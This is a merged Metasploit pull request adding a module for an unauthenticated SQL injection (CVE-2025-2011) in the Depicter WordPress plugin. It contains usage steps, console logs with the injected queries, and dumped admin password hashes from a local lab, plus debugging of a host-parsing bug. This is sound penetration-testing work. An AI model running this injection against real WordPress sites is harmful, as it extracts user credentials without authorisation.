Skip to content

Add WP Depicter Plugin Unauth SQL Injection (CVE-2025-2011) #20185

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 6 commits into from
May 28, 2025
Merged

Add WP Depicter Plugin Unauth SQL Injection (CVE-2025-2011) #20185

merged 6 commits into from
May 28, 2025

Conversation

Chocapikk
Copy link
Contributor

@Chocapikk Chocapikk commented May 14, 2025
edited
Loading

Hello Metasploit Team,

This PR implements a new auxiliary scanner module scanner/http/wp_depicter_sqli_cve_2025_2011 for CVE-2025-2011, an UNAUTHENTICATED SQL injection in the Slider & Popup Builder by Depicter plugin (≤ 3.6.1).

The module automates:

  1. Database enumeration via a UNION-based payload on admin-ajax.php?s=
  2. Table enumeration to infer the WordPress table prefix
  3. User credential extraction (user_login:user_pass) from the inferred *_users table
  4. Credential creation, loot storage (wordpress.users), and reporting

Verification

  • Start msfconsole
  • use auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011
  • set RHOSTS <target_ip>
  • set RPORT <http_port>
  • set TARGETURI /
  • set COUNT 1
  • Run the module
    • ✔️ Should display:
      • Database name (e.g. exploit_market)
      • Tables list and inferred prefix (e.g. wp_users)
      • User credentials in a formatted table
      • Loot saved under wordpress.users
  • Verify credentials are created in the database (if connected)
  • Verify no side effects on the plugin or site functionality

sjanusz-r7
sjanusz-r7 reviewed May 15, 2025
View reviewed changes
@dledda-r7 dledda-r7 self-assigned this May 20, 2025
dledda-r7
dledda-r7 reviewed May 21, 2025
View reviewed changes
@Chocapikk
Copy link
Contributor Author

Hello @dledda-r7 ,

I’m running into an odd issue with the auxiliary module:

Working
When I use exploit, everything behaves as expected:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'cIJK')
[*] {SQLi} Encoded to (select 0x63494a4b)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 12 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 12 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(euCJqzGY) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) euCJqzGY from wp_users limit 1) zSl)
[*] {SQLi} Encoded to (select group_concat(euCJqzGY) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x7,0)),ifnull(user_pass,repeat(0x7b,0))) as binary) euCJqzGY from wp_users limit 1) zSl)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    chocapikk   $wp$2y$10$rc5oXfNPG.bYSnbYvELKZeGgoQ9.QHcAXG8U/xunfXzsviMQkiPga

[+] Loot saved to: /home/chocapikk/.msf4/loot/20250521182831_default_127.0.0.1_wordpress.users_873419.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Failing
But when I try run http://lab:5555, it immediately errors out:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://lab:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'OEFldU')
[*] {SQLi} Encoded to (select 0x4f45466c6455)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in 'Rex::Socket.rex_resolve_hostname'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in 'Rex::Socket.rex_getaddrinfo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in 'Rex::Socket.getaddresses'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in 'Rex::Socket.getaddress'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in 'Rex::Socket.resolv_nbo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in 'Rex::Socket.resolv_nbo_i'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in 'Rex::Socket::SwitchBoard#best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in 'Rex::Socket::SwitchBoard.best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in 'Rex::Socket::Parameters#comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in 'Rex::Socket.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in 'Rex::Socket::Tcp.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in 'Rex::Socket::Tcp.create'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:177:in 'Rex::Proto::Http::Client#connect'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:262:in 'Rex::Proto::Http::Client#send_request'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:240:in 'Rex::Proto::Http::Client#_send_recv'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:214:in 'Rex::Proto::Http::Client#send_recv'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:381:in 'Msf::Exploit::Remote::HttpClient#send_request_raw'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:423:in 'Msf::Exploit::Remote::HttpClient#send_request_cgi'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in 'block in Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#get_sqli_object'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:58:in 'Msf::Exploit::SQLi::Common#raw_run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:69:in 'Msf::Exploit::SQLi::Common#run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in 'Msf::Exploit::SQLi::MySQLi::Common#test_vulnerable'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in 'Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:44:in 'Msf::Exploit::Remote::AutoCheck#with_prepended_auto_check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:20:in 'Msf::Exploit::Remote::AutoCheck#run'
[*] Auxiliary module execution completed

Do you have any insight into why this is happening? Thanks!

@dledda-r7
Copy link
Contributor

dledda-r7 commented May 22, 2025
edited
Loading

Hello @dledda-r7 ,

I’m running into an odd issue with the auxiliary module:

Working When I use exploit, everything behaves as expected:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > exploit
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'cIJK')
[*] {SQLi} Encoded to (select 0x63494a4b)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 12 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 12 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(euCJqzGY) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) euCJqzGY from wp_users limit 1) zSl)
[*] {SQLi} Encoded to (select group_concat(euCJqzGY) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x7,0)),ifnull(user_pass,repeat(0x7b,0))) as binary) euCJqzGY from wp_users limit 1) zSl)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'chocapikk' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    chocapikk   $wp$2y$10$rc5oXfNPG.bYSnbYvELKZeGgoQ9.QHcAXG8U/xunfXzsviMQkiPga

[+] Loot saved to: /home/chocapikk/.msf4/loot/20250521182831_default_127.0.0.1_wordpress.users_873419.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Failing But when I try run http://lab:5555, it immediately errors out:

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://lab:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'OEFldU')
[*] {SQLi} Encoded to (select 0x4f45466c6455)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in 'Rex::Socket.rex_resolve_hostname'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in 'Rex::Socket.rex_getaddrinfo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in 'Rex::Socket.getaddresses'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in 'Rex::Socket.getaddress'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in 'Rex::Socket.resolv_nbo'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in 'Rex::Socket.resolv_nbo_i'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in 'Rex::Socket::SwitchBoard#best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in 'Rex::Socket::SwitchBoard.best_comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in 'Rex::Socket::Parameters#comm'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in 'Rex::Socket.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in 'Rex::Socket::Tcp.create_param'
[-]   /opt/metasploit/vendor/bundle/ruby/3.4.0/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in 'Rex::Socket::Tcp.create'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:177:in 'Rex::Proto::Http::Client#connect'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:262:in 'Rex::Proto::Http::Client#send_request'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:240:in 'Rex::Proto::Http::Client#_send_recv'
[-]   /opt/metasploit/lib/rex/proto/http/client.rb:214:in 'Rex::Proto::Http::Client#send_recv'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:381:in 'Msf::Exploit::Remote::HttpClient#send_request_raw'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/http_client.rb:423:in 'Msf::Exploit::Remote::HttpClient#send_request_cgi'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in 'block in Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#get_sqli_object'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:58:in 'Msf::Exploit::SQLi::Common#raw_run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/common.rb:69:in 'Msf::Exploit::SQLi::Common#run_sql'
[-]   /opt/metasploit/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in 'Msf::Exploit::SQLi::MySQLi::Common#test_vulnerable'
[-]   /opt/metasploit/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in 'Msf::Modules::Auxiliary__Gather__Wp_depicter_sqli_cve_2025_2011::MetasploitModule#check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:44:in 'Msf::Exploit::Remote::AutoCheck#with_prepended_auto_check'
[-]   /opt/metasploit/lib/msf/core/exploit/remote/auto_check.rb:20:in 'Msf::Exploit::Remote::AutoCheck#run'
[*] Auxiliary module execution completed

Do you have any insight into why this is happening? Thanks!

Looks like an unrelated issue. I have digged a bit and i think we are passing the whole RHOSTS to the name resolver which doesn't look correct. adding @zeroSteiner for visibility as he was working on rex-socket currently.

[1] pry(#<Rex::Proto::Http::Client>)> exit

From: /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:979 Rex::Socket.rex_resolve_hostname:

    974:
    975:   # @param name [String] The hostname to lookup via the resolver
    976:   # @param resolver [Rex::Proto::DNS::CachedResolver] Resolver to query for the name
    977:   # @return [Array] Array of Dnsruby::Message responses for consumers to reformat
    978:   def self.rex_resolve_hostname(name, resolver: @@resolver)
 => 979:     binding.pry
    980:     raise ::SocketError.new(
    981:       "Rex::Socket internal DNS resolution requires passing/setting a resolver"
    982:     ) unless resolver
    983:     raise ::SocketError.new(
    984:       "Rex::Socket internal DNS resolution requires passing a String name to resolve"

[1] pry(Rex::Socket)> name
=> "http://127.0.0.1:5555"
[2] pry(Rex::Socket)>

additional context. seems a problem related to this module but not to all auxiliary modules.

msf6 auxiliary(scanner/http/title) > run http://localhost:5555/
[+] [127.0.0.1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 1 of 2 hosts (50% complete)
[+] [::1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) > run RHOSTS=http://localhost:5555/
[+] [127.0.0.1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 1 of 2 hosts (50% complete)
[+] [::1:5555] [C:200] [R:] [S:Apache/2.4.62 (Debian)] Website
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/title) > use depicter

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  auxiliary/gather/wp_depicter_sqli_cve_2025_2011  2025-05-08       normal  No     WordPress Depicter Plugin SQL Injection (CVE-2025-2011)


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/gather/wp_depicter_sqli_cve_2025_2011

[*] Using auxiliary/gather/wp_depicter_sqli_cve_2025_2011
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://localhost:5555/
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'CTU7Crn3')
[*] {SQLi} Encoded to (select 0x4354553743726e33)
[-] Auxiliary failed: SocketError getaddrinfo: Name or service not known
[-] Call stack:
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:1006:in `rex_resolve_hostname'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:960:in `rex_getaddrinfo'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:236:in `getaddresses'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:217:in `getaddress'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:326:in `resolv_nbo'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:343:in `resolv_nbo_i'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:233:in `best_comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/switch_board.rb:127:in `best_comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/parameters.rb:371:in `comm'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket.rb:52:in `create_param'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:37:in `create_param'
[-]   /home/kali/.rvm/gems/ruby-3.2.5@metasploit-framework/gems/rex-socket-0.1.61/lib/rex/socket/tcp.rb:28:in `create'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:177:in `connect'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:262:in `send_request'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:240:in `_send_recv'
[-]   /home/kali/Documents/github/metasploit-framework/lib/rex/proto/http/client.rb:214:in `send_recv'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:381:in `send_request_raw'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/http_client.rb:423:in `send_request_cgi'
[-]   /home/kali/Documents/github/metasploit-framework/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:76:in `block in get_sqli_object'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/common.rb:58:in `raw_run_sql'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/common.rb:69:in `run_sql'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/sqli/mysqli/common.rb:202:in `test_vulnerable'
[-]   /home/kali/Documents/github/metasploit-framework/modules/auxiliary/gather/wp_depicter_sqli_cve_2025_2011.rb:93:in `check'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:44:in `with_prepended_auto_check'
[-]   /home/kali/Documents/github/metasploit-framework/lib/msf/core/exploit/remote/auto_check.rb:20:in `run'
[*] Auxiliary module execution completed

dledda-r7
dledda-r7 reviewed May 28, 2025
View reviewed changes
dledda-r7
dledda-r7 approved these changes May 28, 2025
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment
edited
Loading

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looks good

msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) > run http://127.0.0.1:5555
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[*] {SQLi} Executing (select 'I3pDUa69ad')
[*] {SQLi} Encoded to (select 0x49337044556136396164)
[+] The target is vulnerable.
[*] {SQLi} Executing (SELECT 6 FROM information_schema.tables WHERE table_name = 'wp_users')
[*] {SQLi} Encoded to (SELECT 6 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
[*] {WPSQLi} Retrieved default table prefix: 'wp_'
[*] {SQLi} Executing (select group_concat(KbVRV) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[*] {SQLi} Encoded to (select group_concat(KbVRV) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0xc3,0)),ifnull(user_pass,repeat(0x80,0))) as binary) KbVRV from wp_users limit 1) jgpkCCkA)
[!] No active DB -- Credential data will not be saved!
[+] {WPSQLi} Credential for user 'admin' created successfully.
[*] {WPSQLi} Dumped user data:
wp_users
========

    user_login  user_pass
    ----------  ---------
    admin       $wp$2y$10$M8h2oj7BOKVXdKQMqYADbO8p3amrEj2iwVk0oGXYaGOpx948QVls2

[+] Loot saved to: /home/kali/.msf4/loot/20250528120414_default_127.0.0.1_wordpress.users_787790.txt
[*] {WPSQLi} Reporting host...
[*] {WPSQLi} Reporting service...
[*] {WPSQLi} Reporting vulnerability...
[+] {WPSQLi} Reporting completed successfully.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/wp_depicter_sqli_cve_2025_2011) >

@dledda-r7 dledda-r7 merged commit 9b7e27e into rapid7:master May 28, 2025
31 of 32 checks passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sjanusz-r7 sjanusz-r7 sjanusz-r7 left review comments

@msutovsky-r7 msutovsky-r7 msutovsky-r7 left review comments

@dledda-r7 dledda-r7 dledda-r7 approved these changes

Assignees

@dledda-r7 dledda-r7

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@Chocapikk @dledda-r7 @sjanusz-r7 @msutovsky-r7